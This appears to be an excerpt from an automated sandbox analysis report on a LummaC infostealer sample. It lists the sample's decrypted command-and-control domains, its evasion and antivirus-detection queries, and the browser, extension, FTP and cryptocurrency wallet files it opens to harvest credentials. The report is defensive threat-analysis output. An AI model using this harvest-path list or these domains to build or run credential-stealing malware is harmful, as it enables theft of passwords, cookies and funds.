Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: NAnOVCOt4L.exe, 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: NAnOVCOt4L.exe, 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: NAnOVCOt4L.exe, 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: NAnOVCOt4L.exe, 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: NAnOVCOt4L.exe, 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: NAnOVCOt4L.exe, 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: NAnOVCOt4L.exe, 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: NAnOVCOt4L.exe, 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: NAnOVCOt4L.exe, 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: observerfry.lat

Source: NAnOVCOt4L.exe, 00000000.00000002.2377042491.0000000000248000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: rProgram Manager

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: NAnOVCOt4L.exe, 00000000.00000003.1857366186.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1853870461.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1857566717.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1854093448.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1854093448.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: NAnOVCOt4L.exe PID: 7008, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: NAnOVCOt4L.exe	String found in binary or memory: %appdata%\Electrum\wallets
Source: NAnOVCOt4L.exe	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: NAnOVCOt4L.exe	String found in binary or memory: Wallets/JAXX New Version
Source: NAnOVCOt4L.exe	String found in binary or memory: window-state.json
Source: NAnOVCOt4L.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: NAnOVCOt4L.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: NAnOVCOt4L.exe	String found in binary or memory: %appdata%\Ethereum
Source: NAnOVCOt4L.exe, 00000000.00000003.1832109571.0000000001511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: NAnOVCOt4L.exe, 00000000.00000003.1854186699.0000000001512000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
